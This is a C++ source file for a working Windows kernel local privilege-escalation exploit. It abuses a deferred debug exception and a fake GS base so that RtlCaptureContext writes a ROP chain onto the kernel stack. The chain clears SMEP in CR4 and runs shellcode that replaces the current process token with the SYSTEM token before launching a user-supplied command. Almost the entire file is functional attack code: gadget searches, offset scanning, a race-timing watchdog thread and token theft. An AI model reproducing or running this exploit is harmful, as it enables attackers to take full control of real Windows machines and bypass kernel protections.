#include <iostream>
#include <Windows.h>
#include <intrin.h>
#include "KernelRoutines.h"
#include "LockedMemory.h"
#include "Native.h"
#include "Error.h"

// View of the first four quadwords of an interrupt return frame, as read and
// patched by KernelShellcode while it walks the nested trap frames.
struct ISR_STACK
{
	uint64_t RIP;	// Saved instruction pointer of the interrupted code
	uint64_t CS;	// Saved code-segment selector (compared against 0x10 / 0x33 below)
	uint64_t EF;	// Saved flags (presumably RFLAGS; the dump in KernelShellcode shows 0x202 here)
	uint64_t RSP;	// Saved stack pointer of the interrupted code
};

// Doesn't really change
// Hard-coded structure offsets used when populating the fake PCR/PRCB/KTHREAD
// buffers in main() and when reading gs-relative data in KernelShellcode.
// NOTE(review): these are assumed stable across the targeted builds; nothing in
// this file verifies them.
static const uint32_t Offset_Pcr__Self = 0x18;
static const uint32_t Offset_Pcr__CurrentPrcb = 0x20;
static const uint32_t Offset_Pcr__Prcb = 0x180;
static const uint32_t Offset_Prcb__CurrentThread = 0x8;
static const uint32_t Offset_Context__XMM13 = 0x270;		// Offset of Xmm13 inside CONTEXT
static const uint32_t MxCsr__DefVal = 0x1F80;			// Value main() stores at Prcb + 0 (Prcb.MxCsr)
static const uint32_t Offset_Prcb__RspBase = 0x28;
static const uint32_t Offset_KThread__InitialStack = 0x28;
// The two offsets below are expressed as 0x100 + field offset; presumably 0x100
// is the start of the saved processor-state area inside the PRCB (TODO confirm).
static const uint32_t Offset_Prcb__Cr8 = 0x100 + 0xA0;
static const uint32_t Offset_Prcb__Cr4 = 0x100 + 0x18;

// Requires patterns
// These two offsets start at 0 and are filled in by main(), which scans the
// first 0x50 bytes of the named exports for a `mov` followed by call/retn and
// takes the 32-bit displacement.
NON_PAGED_DATA static uint32_t Offset_Prcb__Context = 0x0;                   // @KeBugCheckEx
NON_PAGED_DATA static uint32_t Offset_KThread__ApcStateFill__Process = 0x0;  // @PsGetCurrentProcess

// Buffer handed to __triggervuln and to the return stub (in rcx).
// NOTE(review): its exact contents are defined by the assembly helpers, which
// are not visible in this file.
NON_PAGED_DATA uint64_t ContextBackup[ 10 ];

// Addresses of kernel routines/data, resolved in main() via
// KrCtx->GetProcAddress and invoked from KernelShellcode.
NON_PAGED_DATA fnFreeCall k_PsDereferencePrimaryToken = 0;
NON_PAGED_DATA fnFreeCall k_PsReferencePrimaryToken = 0;
NON_PAGED_DATA fnFreeCall k_PsGetCurrentProcess = 0;
NON_PAGED_DATA uint64_t* k_PsInitialSystemProcess = 0;

NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0;

// Signature used to call the copied stub below: with the x64 calling
// convention the three arguments arrive in rcx, rdx and r8, which is what the
// machine code expects.
using fnIRetToVulnStub = void( * )( uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup );

// Raw x64 machine code. KernelShellcode copies it into memory returned by
// k_ExAllocatePool and calls it as its final step. It writes Cr4 back, switches
// the stack to IsrStack, leaves ContextBackup in rcx, re-enables interrupts,
// zeroes CR8 and executes iretq on the frame at IsrStack.
NON_PAGED_DATA BYTE IRetToVulnStub[] = 
{
	0x0F, 0x22, 0xE1,		// mov cr4, rcx ; cr4 = original cr4
	0x48, 0x89, 0xD4,		// mov rsp, rdx ; stack = isr stack
	0x4C, 0x89, 0xC1,		// mov rcx, r8  ; rcx = ContextBackup
	0xFB,				// sti          ; enable interrupts
	0x48, 0x31, 0xC0,               // xor rax, rax ; lower irql to passive_level 
	0x44, 0x0F, 0x22, 0xC0,         // mov cr8, rax
	0x48, 0xCF			// iretq        ; interrupt return
};

// Both values are written by the watchdog thread created in main() and read by
// KernelShellcode to locate the interrupt frames on the kernel stack.
NON_PAGED_DATA uint64_t PredictedNextRsp = 0;	// Last observed Ctx->Rsp plus StackDelta
NON_PAGED_DATA ptrdiff_t StackDelta = 0;	// Difference between two consecutive observed Ctx->Rsp values

// Final target of the ROP chain assembled in main() (its address is stored in
// SetCr4Retn[ 1 ]). The routine:
//   1. clears DR7 and rewrites CR4 from the value saved at
//      gs:[Offset_Pcr__Prcb + Offset_Prcb__Cr4] with bit 20 cleared,
//   2. swaps GS, walks the interrupt frames using PredictedNextRsp/StackDelta,
//   3. copies IRetToVulnStub into memory obtained from k_ExAllocatePool,
//   4. replaces the current process's primary-token reference with the one of
//      *k_PsInitialSystemProcess,
//   5. swaps GS back, bumps the saved RIP by one and leaves through the stub.
// It does not return normally: control leaves via the iretq in the stub.
NON_PAGED_CODE void KernelShellcode()
{
	// Disable all hardware breakpoints configured by main().
	__writedr( 7, 0 );

	// gs still points at the fake PCR set up in main(), so this reads the CR4
	// value stored in the fake Prcb. Bit 20 is cleared before writing it to CR4
	// (main() prints the ROP-chain CR4 value under the label "cr4_nosmep").
	uint64_t Cr4Old = __readgsqword( Offset_Pcr__Prcb + Offset_Prcb__Cr4 );
	__writecr4( Cr4Old & ~( 1 << 20 ) );

	__swapgs();

	// Uncomment if it bugchecks to debug:
	// __writedr( 2, StackDelta );
	// __writedr( 3, PredictedNextRsp );
	// __debugbreak();
	// ^ This will let you see StackDelta and RSP clearly in a crash dump so you can check where the process went bad
	
	// Starting guess for the innermost interrupt frame.
	// NOTE(review): the 0x38 adjustment is empirical; its derivation is not shown here.
	uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38;

	// Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiTrapDebugOrFault
	// Continue while the frame's saved CS is 0x10 and its saved RIP lies above
	// 0x7FFFFFFEFFFF (presumably: a frame that interrupted kernel-mode code).
	while ( 
		( ( ISR_STACK* ) IsrStackIterator )->CS == 0x10 &&
		( ( ISR_STACK* ) IsrStackIterator )->RIP > 0x7FFFFFFEFFFF )
	{

		// Assembly helper defined outside this file; called once per unwound frame.
		__rollback_isr( IsrStackIterator );

		// We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta
		// The frame 0x30 bytes further up has CS == 0x33 (presumably the user-mode
		// code selector), so that is the frame to return through.
		if ( ( ( ISR_STACK* ) ( IsrStackIterator + 0x30 ) )->CS == 0x33 )
		{
			/*
			fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap
			fffff00e`d7a1bc40 0000000000000010 
			fffff00e`d7a1bc48 0000000000000002 
			fffff00e`d7a1bc50 fffff00ed7a1bc68 
			fffff00e`d7a1bc58 0000000000000000 
			fffff00e`d7a1bc60 0000000000000014 
			fffff00e`d7a1bc68 00007ff7e2261e95 --
			fffff00e`d7a1bc70 0000000000000033 
			fffff00e`d7a1bc78 0000000000000202 
			fffff00e`d7a1bc80 000000ad39b6f938 
			*/
			IsrStackIterator = IsrStackIterator + 0x30;
			break;
		}

		// Otherwise step to the next frame using the measured per-trap stack delta.
		IsrStackIterator -= StackDelta;
	}


	// Copy the return stub into memory from k_ExAllocatePool (first argument 0
	// is the pool type) so it can be executed after the user-mode mappings are
	// no longer appropriate to run from.
	// NOTE(review): the reason for copying rather than calling in place is inferred.
	PVOID KStub = ( PVOID ) k_ExAllocatePool( 0ull, ( uint64_t )sizeof( IRetToVulnStub ) );
	Np_memcpy( KStub, IRetToVulnStub, sizeof( IRetToVulnStub ) );

	// ------ KERNEL CODE ------

	uint64_t SystemProcess = *k_PsInitialSystemProcess;
	uint64_t CurrentProcess = k_PsGetCurrentProcess();

	uint64_t CurrentToken = k_PsReferencePrimaryToken( CurrentProcess );
	uint64_t SystemToken = k_PsReferencePrimaryToken( SystemProcess );

	// Scan the first 0x500 bytes of the current process object, 8 bytes at a
	// time, for the field that holds CurrentToken (low 4 bits masked off) and
	// overwrite it with SystemToken.
	for ( int i = 0; i < 0x500; i += 0x8 )
	{
		uint64_t Member = *( uint64_t * ) ( CurrentProcess + i );

		if ( ( Member & ~0xF ) == CurrentToken )
		{
			*( uint64_t * ) ( CurrentProcess + i ) = SystemToken;
			break;
		}
	}


	// Drop the references taken by the two k_PsReferencePrimaryToken calls above.
	k_PsDereferencePrimaryToken( CurrentToken );
	k_PsDereferencePrimaryToken( SystemToken );

	// ------ KERNEL CODE ------

	__swapgs();

	// Advance the saved return address by one byte before returning through it
	// (presumably to step past a one-byte instruction in __triggervuln — TODO confirm).
	( ( ISR_STACK* ) IsrStackIterator )->RIP += 1;
	// Restore the original CR4 and iretq through the selected frame.
	( fnIRetToVulnStub( KStub ) )( Cr4Old, IsrStackIterator, ContextBackup );
}

// Allocates Sz bytes of committed read/write memory with VirtualAlloc, zeroes
// it, and calls Np_TryLockPage on every 0x1000-byte page of the range.
//
// Sz      Size of the region in bytes.
// Returns Base address of the region.
// NOTE(review): neither the VirtualAlloc result nor the Np_TryLockPage results
// are checked here.
PUCHAR AllocateLockedMemoryForKernel( SIZE_T Sz )
{
	PUCHAR Va = ( PUCHAR ) VirtualAlloc( 0, Sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
	ZeroMemory( Va, Sz );
	// One lock attempt per page.
	for ( int i = 0; i < Sz; i += 0x1000 )
		Np_TryLockPage( Va + i );
	return Va;
}

// Program entry point. Expects one argument (argv[1]), which is passed to
// system() at the very end. In order, it: checks KVA shadow, locks code/data
// pages, builds fake PCR/PRCB/KTHREAD/KPROCESS buffers, locates gadgets and
// structure offsets in the user-mode mapped kernel image, starts a watchdog
// thread that measures the stack delta, arms debug registers, loads the ROP
// chain into XMM13-XMM15, swaps the GS base and calls __triggervuln.
// Returns 0 when no argument is supplied; otherwise falls off the end of main.
int main(int argc, char *argv[])
{
	// argv[1] is required because it is handed to system() at the end.
	if (argc < 2){
		return 0;
	}
	// Pre-init checks: KVA Shadow
	// When the query succeeds (returns 0), require that KVA shadowing is disabled.
	SYSTEM_KERNEL_VA_SHADOW_INFORMATION KvaInfo = { 0 };
	if ( !NtQuerySystemInformation( SystemKernelVaShadowInformation, &KvaInfo, ( uint64_t ) sizeof( KvaInfo ), 0ull ) )
		assert( !KvaInfo.KvaShadowFlags.KvaShadowEnabled );

	// Initialization: Memory allocation, locking sections, loading nt
	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xA );
	
	assert( Np_LockSections() );
	assert( Np_TryLockPage( &__rollback_isr ) );
	assert( Np_TryLockPage( &__swapgs ) );

	KernelContext* KrCtx = Kr_InitContext();
	assert( KrCtx );

	// These are static so the capture-less lambda below can refer to Prcb.
	static PUCHAR Pcr = AllocateLockedMemoryForKernel( 0x10000 );
	static PUCHAR KThread = AllocateLockedMemoryForKernel( 0x10000 );
	static PUCHAR KProcess = AllocateLockedMemoryForKernel( 0x10000 );
	static PUCHAR Prcb = Pcr + Offset_Pcr__Prcb;


	// Offsets: Finding offsets and ROP gadgets
	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xB );

	// Walk the PE headers of the image at KrCtx->NtLib and advance to its
	// ".text" section header.
	PIMAGE_DOS_HEADER DosHeader = ( PIMAGE_DOS_HEADER ) KrCtx->NtLib;
	PIMAGE_NT_HEADERS FileHeader = ( PIMAGE_NT_HEADERS ) ( ( uint64_t ) DosHeader + DosHeader->e_lfanew );
	PIMAGE_SECTION_HEADER SectionHeader = ( PIMAGE_SECTION_HEADER ) ( ( ( uint64_t ) &FileHeader->OptionalHeader ) + FileHeader->FileHeader.SizeOfOptionalHeader );
	while ( _strcmpi( ( char* ) SectionHeader->Name, ".text" ) ) SectionHeader++;

	uint64_t AdrRetn = 0;
	uint64_t AdrPopRcxRetn = 0;
	uint64_t AdrSetCr4Retn = 0;

	PUCHAR NtBegin = ( PUCHAR ) KrCtx->NtLib + SectionHeader->VirtualAddress;
	PUCHAR NtEnd = NtBegin + SectionHeader->Misc.VirtualSize;

	// Each search below takes the first byte-pattern match in .text and rebases
	// it from the local mapping (KrCtx->NtLib) to KrCtx->NtBase.

	// Find [RETN]
	for ( PUCHAR It = NtBegin; It < NtEnd; It++ )
	{
		if ( It[ 0 ] == 0xC3 )
		{
			AdrRetn = It - ( PUCHAR ) KrCtx->NtLib + KrCtx->NtBase;
			break;
		}
	}

	// Find [POP RCX; RETN]
	for ( PUCHAR It = NtBegin; It < NtEnd; It++ )
	{
		if ( It[ 0 ] == 0x59 && It[ 1 ] == 0xC3 )
		{
			AdrPopRcxRetn = It - ( PUCHAR ) KrCtx->NtLib + KrCtx->NtBase;
			break;
		}
	}

	// Find [MOV CR4, RCX; RETN]
	for ( PUCHAR It = NtBegin; It < NtEnd; It++ )
	{
		if ( It[ 0 ] == 0x0F && It[ 1 ] == 0x22 &&
			 It[ 2 ] == 0xE1 && It[ 3 ] == 0xC3 )
		{
			AdrSetCr4Retn = It - ( PUCHAR ) KrCtx->NtLib + KrCtx->NtBase;
			break;
		}
	}

	printf( "[+] [RETN]                Gadget @ %16llx\n", AdrRetn );
	printf( "[+] [POP RCX; RETN]       Gadget @ %16llx\n", AdrPopRcxRetn );
	printf( "[+] [MOV CR4, RCX; RETN]  Gadget @ %16llx\n", AdrSetCr4Retn );

	assert( AdrRetn );
	assert( AdrPopRcxRetn );
	assert( AdrSetCr4Retn );

	PUCHAR UPsGetCurrentProcess = ( PUCHAR ) GetProcAddress( KrCtx->NtLib, "PsGetCurrentProcess" );
	PUCHAR UKeBugCheckEx = ( PUCHAR ) GetProcAddress( KrCtx->NtLib, "KeBugCheckEx" );

	// Scan the first 0x50 bytes of KeBugCheckEx for "48 8B ?? <disp32> E8" and
	// take the 32-bit displacement at +3 as Offset_Prcb__Context.
	for ( int i = 0; i < 0x50; i++ )
	{
		if ( UKeBugCheckEx[ i ] == 0x48 && UKeBugCheckEx[ i + 1 ] == 0x8B &&  // mov rax, 
			 UKeBugCheckEx[ i + 7 ] == 0xE8 )                             // call
		{
			Offset_Prcb__Context = *( int32_t * ) ( UKeBugCheckEx + i + 3 );
			break;
		}
	}

	// Same idea for PsGetCurrentProcess: "48 8B ?? <disp32> C3" yields
	// Offset_KThread__ApcStateFill__Process.
	for ( int i = 0; i < 0x50; i++ )
	{
		if ( UPsGetCurrentProcess[ i ] == 0x48 && UPsGetCurrentProcess[ i + 1 ] == 0x8B &&  // mov rax, 
			 UPsGetCurrentProcess[ i + 7 ] == 0xC3 )                                    // retn
		{
			Offset_KThread__ApcStateFill__Process = *( int32_t * ) ( UPsGetCurrentProcess + i + 3 );
			break;
		}
	}

	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xD );
	// NOTE(review): both arguments are uint32_t but the format is %llx.
	printf( "[+] Prcb.Context                 @ %16llx\n", Offset_Prcb__Context );
	printf( "[+] KThread.ApcStateFill.Process @ %16llx\n", Offset_KThread__ApcStateFill__Process );

	assert( Offset_Prcb__Context );
	assert( Offset_KThread__ApcStateFill__Process );

	// Setting up GSBASE
	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xC );

	// Populate the fields of the fake PCR/PRCB/KTHREAD buffers.
	*( PVOID* ) ( Pcr + Offset_Pcr__Self )				= Pcr;				// Pcr.Self
	*( PVOID* ) ( Pcr + Offset_Pcr__CurrentPrcb )			= Pcr + Offset_Pcr__Prcb;	// Pcr.CurrentPrcb
	*( DWORD* ) ( Prcb )						= MxCsr__DefVal;		// Prcb.MxCsr
	*( PVOID* ) ( Prcb + Offset_Prcb__CurrentThread )		= KThread;			// Prcb.CurrentThread
	*( PVOID* ) ( Prcb + Offset_Prcb__Context )			= Prcb + 0x3000;		// Prcb.Context, Placeholder
	*( PVOID* ) ( KThread + Offset_KThread__ApcStateFill__Process ) = KProcess;			// EThread.ApcStateFill.EProcess
	*( PVOID* ) ( Prcb + Offset_Prcb__RspBase )			= (PVOID) 1;			// Prcb.RspBase
	*( PVOID* ) ( KThread + Offset_KThread__InitialStack )		= 0;				// EThread.InitialStack

	printf( "[+] Finished setting up fake PCR!\n" );
	printf( "[+] Pcr       @ %16llx\n", Pcr );
	printf( "[+] Prcb      @ %16llx\n", Prcb );
	printf( "[+] EThread   @ %16llx\n", KThread );
	printf( "[+] EProcess  @ %16llx\n", KProcess );

	// Current SS selector; its address is used for the Dr0 breakpoint and is
	// passed to __triggervuln.
	NON_PAGED_DATA static DWORD SavedSS = __readss();

	// Execute Exploit!
	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xF );

	// Watchdog thread: polls the placeholder CONTEXT (Prcb + 0x3000) for Rsp
	// changes, derives StackDelta/PredictedNextRsp, then redirects the
	// Prcb.Context pointer so that the XMM13 slot of the next captured context
	// lands on the predicted return-address location.
	HANDLE ThreadHandle = CreateThread( 0, 0, [ ] ( LPVOID ) -> DWORD
	{
		volatile PCONTEXT Ctx = *( volatile PCONTEXT* ) ( Prcb + Offset_Prcb__Context );

		while ( !Ctx->Rsp );						// Wait for RtlCaptureContext to be called once so we get leaked RSP
		uint64_t StackInitial = Ctx->Rsp;
		while ( Ctx->Rsp == StackInitial );				// Wait for it to be called another time so we get the stack pointer difference 
										// between sequential KiDebugTrapOrFault's
		StackDelta = Ctx->Rsp - StackInitial;
		PredictedNextRsp = Ctx->Rsp + StackDelta;			// Predict next RSP value when RtlCaptureContext is called
		uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8;		// Predict where the return pointer will be located at
		NextRetPtrStorage &= ~0xF;					// Round down to a 16-byte boundary
		*( uint64_t* ) ( Prcb + Offset_Prcb__Context ) = NextRetPtrStorage - Offset_Context__XMM13;	
		                                                                // Make RtlCaptureContext write XMM13-XMM15 over it
		return 0;
	}, 0, 0, 0 );

	assert( ThreadHandle );
	printf( "\n- Created context watchdog\n" );
	printf( "- Thread Id:       %16llx\n", ( HANDLE ) GetThreadId( ThreadHandle ) );

	assert( SetThreadPriority( ThreadHandle, THREAD_PRIORITY_TIME_CRITICAL ) );
	printf( "- Elevated priority to: THREAD_PRIORITY_TIME_CRITICAL\n" );
	// Watchdog may run on any of CPUs 1-31; the current thread (pseudo-handle -2)
	// is pinned to CPU 0.
	SetThreadAffinityMask( ThreadHandle, 0xFFFFFFFE );
	SetThreadAffinityMask( HANDLE( -2 ), 0x00000001 );
	printf( "- Seperated exploit and context watchdog processors\n" );

	// Resolve the kernel addresses that KernelShellcode calls through.
	k_ExAllocatePool = KrCtx->GetProcAddress<>( "ExAllocatePool" );
	k_PsReferencePrimaryToken = KrCtx->GetProcAddress<>( "PsReferencePrimaryToken" );
	k_PsDereferencePrimaryToken = KrCtx->GetProcAddress<>( "PsDereferencePrimaryToken" );
	k_PsGetCurrentProcess = KrCtx->GetProcAddress<>( "PsGetCurrentProcess" );
	k_PsInitialSystemProcess = KrCtx->GetProcAddress<uint64_t*>( "PsInitialSystemProcess" );

	printf( "\n" );
	printf( "- PsInitialSystemProcess:     %16llx\n", k_PsInitialSystemProcess );
	printf( "- PsGetCurrentProcess:        %16llx\n", k_PsGetCurrentProcess );
	printf( "- PsReferencePrimaryToken:    %16llx\n", k_PsReferencePrimaryToken );
	printf( "- PsDereferencePrimaryToken:  %16llx\n", k_PsDereferencePrimaryToken );
	printf( "- ExAllocatePool:             %16llx\n", k_ExAllocatePool );
	printf( "\n" );

	// NOTE(review): the banner says "Press any key" but the pause is commented
	// out, so execution continues immediately.
	printf( "/--------------------------------------\\\n" );
	printf( "| Press any key to start exploit!      |\n" );
	printf( "| Warning: This may bugcheck your PC.  |\n" );
	printf( "\\--------------------------------------/\n" );
	//system( "pause>nul" );
	printf( "\n" );

	// Arm two hardware breakpoints on the current thread.
	// NOTE(review): the second Dr7 group sets the R/W field (bits 20-21) to 3,
	// which per the Intel SDM encodes read/write, not write-only as the trailing
	// comment and the Dr1 printf below say — confirm which is intended.
	CONTEXT Ctx = { 0 };
	Ctx.Dr0 = ( uint64_t ) &SavedSS;                        	// Trap SS
	Ctx.Dr1 = ( uint64_t ) Prcb + Offset_Prcb__Cr8;         	// Trap KiSaveProcessorControlState, Cr8 storage
	Ctx.Dr7 = 
		( 1 << 0 ) | ( 3 << 16 ) | ( 3 << 18 ) |	// R/W, 4 Bytes, Active
		( 1 << 2 ) | ( 3 << 20 ) | ( 2 << 22 );		// W,   8 Bytes,  Active
	Ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;

	printf( "[+] Setting up debug registers:\n" );
	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xD );
	printf( "Dr0:    %16llx [@SavedSS]              (R/W, 4 Bytes, Active)\n", Ctx.Dr0 );
	// NOTE(review): the label says CR4 but Dr1 was set to the Cr8 slot above.
	printf( "Dr1:    %16llx [@SpecialRegisters.CR4] (W,   8 Bytes, Active)\n", Ctx.Dr1 );
	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xF );
	assert( SetThreadContext( HANDLE( -2 ), &Ctx ) );
	printf( "\n" );

	// Six quadwords that are loaded into XMM13-XMM15, two per register.
	// 0x506f8 is the CR4 value popped into rcx (printed below as "cr4_nosmep").
	uint64_t RetnRetn[ 2 ] = { AdrRetn, AdrRetn };
	uint64_t PopRcxRetnRcx[ 2 ] = { AdrPopRcxRetn, 0x506f8 };
	uint64_t SetCr4Retn[ 2 ] = { AdrSetCr4Retn, ( uint64_t ) &KernelShellcode };

	// RSP:
	__setxmm13( ( BYTE* ) RetnRetn );		// &retn	// we need to align xmm writes so two place holders just in case!
							// &retn
	__setxmm14( ( BYTE* ) PopRcxRetnRcx );		// &pop rcx
							// 0x506f8
	__setxmm15( ( BYTE* ) SetCr4Retn );		// &mov cr4, rcx; retn
							// &KernelShellcode

	printf( "[+] Built ROP Chain:\n" );
	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xD );
	printf( "-- &retn;                (%016llx)\n", RetnRetn[ 0 ] );
	printf( "-- &retn;                (%016llx)\n", RetnRetn[ 1 ] );
	printf( "-- &pop rcx; retn;       (%016llx)\n", PopRcxRetnRcx[ 0 ] );
	printf( "-- cr4_nosmep            (%016llx)\n", PopRcxRetnRcx[ 1 ] );
	printf( "-- &mov cr4, rcx; retn;  (%016llx)\n", SetCr4Retn[ 0 ] );
	printf( "-- &KernelShellcode      (%016llx)\n", SetCr4Retn[ 1 ] );
	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xF );
	printf( "\n" );


	// Save the real GS base, point it at the fake PCR for the duration of
	// __triggervuln, then restore it.
	PVOID ProperGsBase = __read_gs_base();
	printf( "[+] Writing fake PCR as new GSBASE:  %16llx\n", Pcr );
	printf( "[+] Defering debug exception...\n" );
	__set_gs_base( Pcr );
	__triggervuln( ContextBackup, &SavedSS ); // Let the fun begin
	__set_gs_base( ProperGsBase );
	printf( "[+] Restored old GSBASE:             %16llx\n", ProperGsBase );

	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xA );
	printf( "[+] Exploit successful!\n\n" );


	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xF );
	printf( "/------------------------------------------\\\n" );
	printf( "| Press any key to launch a system console |\n" );
	printf( "\\------------------------------------------/" );
	//system( "pause>nul" );
	// Runs the caller-supplied command line (argv[1]) through the shell.
	system( argv[1] );
}
